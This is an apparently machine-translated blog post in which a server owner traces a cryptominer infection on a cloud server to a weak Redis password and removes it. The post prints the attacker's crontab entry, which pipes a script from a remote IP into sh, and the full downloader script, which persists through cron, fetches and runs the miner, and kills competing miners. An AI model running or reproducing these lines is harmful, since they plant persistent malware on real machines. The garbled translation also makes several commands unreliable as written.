Emmm, to make a long story short, Ali Cloud server has been suspended mining machine.

background

It all started two or three days ago. 7-31 Aliyun sent me a short message.

I also specialized and friends talk about (feng)Root is what ghost logic, and then no reason. Because the server is to play with their own, the development stage to the front-end exposure API, there is no important data. And then:

This text message happened again on 8-2, What, male chauvinism came up, think this 13 is a little too much, a little more serious meaning, and then said to have a look. (My first thought was to see what was wrong with the process)

Take a look at

WTF, not 13 face, 99.3% CPU usage, so I use 0.7%.

Go to the.sshDirectory to see
[root@FantJ .ssh]# ls
authorized_keys
Copy the code

This is a key without secret access! Used for non-encrypted communication between hosts. To delete a decisive.

Find out where the command is
[root@FantJ ~]# find / -name qW3xT*
/tmp/qW3xT.2
Copy the code
The catching

Why I target it:

  1. The PID number is large, proving to be a new thread
  2. Every time I kill a miner, it executes and then it disappears. (This statement will prove later)
  3. From the perspective of CPU stability, CPU general equilibrium is not executed with new instructions.

Kill related processes

 1022  ps -aux|grep ddg
 1023  kill11938, 1024,kill 27507
Copy the code

Looking forddgs.3013

[root@FantJ ~]# find / -name ddgs.3013
/tmp/ddgs.3013
Copy the code

Scheduled tasks?

I didn’t think it was clean, so I thought I’d go check my to-do list.

[root@FantJ tmp]# crontab -l15 * * * * * / curl - fsSL http://149.56.106.215:8000/i.sh | shCopy the code

Emmm, this is such an exciting and joyful moment.

Curl's introduction of several optional, I am also baidu-f-fail silently fails on HTTP error (H) (no output at all)-s- Silent Silent mode. Do not output anything --socks4 HOST [: PORT] Socks4A proxy on a given HOST + PORT --socks5 HOST [: PORT] socks4a proxy on a given HOST + PORT PORT] SOCKS5 proxy on the given HOST + PORT -- SOCKS5 -hostname HOST [: PORT] SOCKS5 proxy, Pass the host name to the proxy --socks5-gssapi-service Name of the SOcks5 proxy service named GSSAPI --socks5-gssapi-nec Compatibility with NEC Socks5 server -s --show-error Displays an error. use-s-l --location follows redirection (H) --location-trusted like --location and sends auth to other hosts (H)Copy the code
[root@FantJ tmp]# crontab -r 
[root@FantJ tmp]# crontab -l
no crontab for root
Copy the code

Then I have to check the i.sh., I suddenly remember that there is a scheduled task, and THEN I run the following job:

[root@FantJ tmp]# curl - fsSL http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root
echo "15 * * * * * / curl - fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root


mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "15 * * * * * / curl - fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root


ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if[!-f "/tmp/ddgs.3013" ]; thenThe curl - fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) - o/TMP/DDGS. 3013fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
Copy the code

Note that this command does not download and execute the sh script. Because I got rid of the pipe. All you see is a printed message. To summarize what this script means:

  1. Set environment variables and write scheduled tasks
  2. Look at the ddgs.3013 process, if it doesn’t exist, re-download the file, give it execute permissions, and execute.
  3. Batch kill processes by keyword.

I found a grep minexmr.com. Check it out, and the same goes for other sites.

reflection

Problem solved, over a period of time to see the process of the situation, should be no, can say to kill quite thorough. So why does this problem arise?

Back to the tip aliyun gave me: Redis. Because I play, so I set the password of redis is very simple root, is also very easy to sweep, and then I correct the password. Make bindIp your own (via the requirepass file or redis-cli ‘config set requirepass XXXX) and, more securely, change the default port. I don’t have any important data, so just make it easy, and I’ll do it again next time.

However, this 13 has a very conscientious operation, is not delete my Redis keys, very professional ethics. But money is still a slave.